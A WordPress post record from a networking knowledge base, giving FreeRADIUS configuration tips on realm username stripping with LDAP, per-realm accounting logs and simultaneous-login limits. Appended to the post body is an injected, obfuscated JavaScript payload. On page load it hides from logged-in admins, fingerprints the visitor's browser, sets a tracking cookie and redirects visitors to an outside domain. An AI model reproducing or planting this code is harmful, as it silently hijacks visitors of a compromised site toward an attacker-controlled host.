{"id":526,"date":"2012-05-10T01:24:15","date_gmt":"2012-05-09T17:24:15","guid":{"rendered":"http:\/\/www.q-station.net\/kb\/?p=526"},"modified":"2012-05-25T13:48:46","modified_gmt":"2012-05-25T05:48:46","slug":"freeradius-special-setup","status":"publish","type":"post","link":"https:\/\/kb.q-station.net\/index.php\/2012\/05\/10\/freeradius-special-setup\/","title":{"rendered":"Freeradius special setup"},"content":{"rendered":"<p>Some special setup which you may find useful when configure Freeradius.<br \/>\n<!--more--><\/p>\n<h1>Authenticate username with domain using MS-Chap v2<\/h1>\n<p>During the MS-Chap v2 authentication, the challenge and response including user name while MS-Chap v1 only contain password.  Such that, you can&#8217;t use the stripped username &#038; NT-Password in LDAP to match the challenge and response.<\/p>\n<p>Our setup will generate a stripped username in authorize session, such that the LDAP module could get the NT password from Samba LDAP by searching the LDAP using the stripped username.  Then, Freeradius could compare the challenge and response using the NT password and the un-stripped username.<\/p>\n<ul>\n<li>Suppose your site store user entry in LDAP, e.g., Samba using LDAP backend<\/li>\n<li>Suppose user entries are storing uid=xxxx, where no realm, e.g, not xxxx@xx.com<\/li>\n<li>setup <strong>proxy.conf<\/strong>, the realm is authenticate with local\n<pre>\r\nrealm \"qstation\" {\r\n      nostrip\r\n      authhost        = LOCAL\r\n      accthost        = LOCAL\r\n}\r\n<\/pre>\n<\/li>\n<li>Stripped the username for LDAP seaching, in <strong>authorize<\/strong> session in <strong>site-enabled\/default<\/strong>, before <strong>ldap<\/strong>\n<pre>\r\n        #  The ldap module will set Auth-Type to LDAP if it has not\r\n        #  already been set\r\n        if(\"%{User-Name}\"){\r\n           if(\"%{User-Name}\" =~ \/^(.*)@qstation$\/){  \r\n                update request {\r\n                        Stripped-User-Name := \"%{1}\"\r\n                }\r\n           }\r\n           # Username in unrecognised format\r\n           #else{\r\n           #        reject\r\n           #}\r\n        }\r\n        ldap\r\n<\/pre>\n<\/li>\n<\/ul>\n<h1>Seperate detail log for proxy realm<\/h1>\n<p>Default installation, all accounting packet including proxied packet are stored in detail log.  For ease of administration, it may be a good idea to separate them by each realm.  You may not have interest for this setup if you are using SQL DB for accounting.<\/p>\n<ul>\n<li>Suppose realm &#8216;qstation&#8217; is proxied to other Radius, in proxy.conf\n<pre>\r\nrealm qstation {\r\n        pool = qstation_pool\r\n        nostrip\r\n}\r\n<\/pre>\n<\/li>\n<p>Create <strong>modules\/detail.qstation<\/strong><\/p>\n<pre>\r\ndetail detail.qstation {\r\n        detailfile = ${radacctdir}\/qstation\/detail-%Y%m%d\r\n}\r\n<\/pre>\n<\/li>\n<li>In <strong>accounting<\/strong> session in <strong>sites-enabled\/default<\/strong>\n<pre>\r\n  if(\"%{User-Name}\" =~ \/^(.*)@qstation$\/) {\r\n        detail.qstation\r\n  }\r\n  else {\r\n        # All other packet logged as usual using detail\r\n        detail\r\n  }\r\n<\/pre>\n<\/li>\n<\/ul>\n<h1>Simultaneous login for Realm<\/h1>\n<p>It is common for your RADIUS need to handle realm redirection and answering request for NULL realm.<\/p>\n<ul>\n<li>In <strong>proxy.conf<\/strong>\n<pre>\r\nrealm NULL {  \r\n        authhost        = LOCAL\r\n        accthost        = LOCAL\r\n        Realm = \"NULL\"\r\n}\r\n<\/pre>\n<\/li>\n<li>In <strong>users<\/strong>\n<pre>\r\n# Limit Simultaneous-Use for realm NULL only\r\nDEFAULT Realm == \"NULL\", Pool-Name := \"main_pool\", Simultaneous-Use := 1\r\n            Fall-Through = Yes\r\n\r\nDEFAULT Framed-Protocol == PPP, Pool-Name := \"main_poolx\"\r\n        Framed-Protocol = PPP,\r\n        Framed-Compression = Van-Jacobson-TCP-IP\r\n<\/pre>\n<\/li>\n<\/ul>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Some special setup which you may find useful when configure Freeradius.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[27,8],"tags":[69],"_links":{"self":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/526"}],"collection":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/comments?post=526"}],"version-history":[{"count":14,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/526\/revisions"}],"predecessor-version":[{"id":557,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/526\/revisions\/557"}],"wp:attachment":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/media?parent=526"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/categories?post=526"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/tags?post=526"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}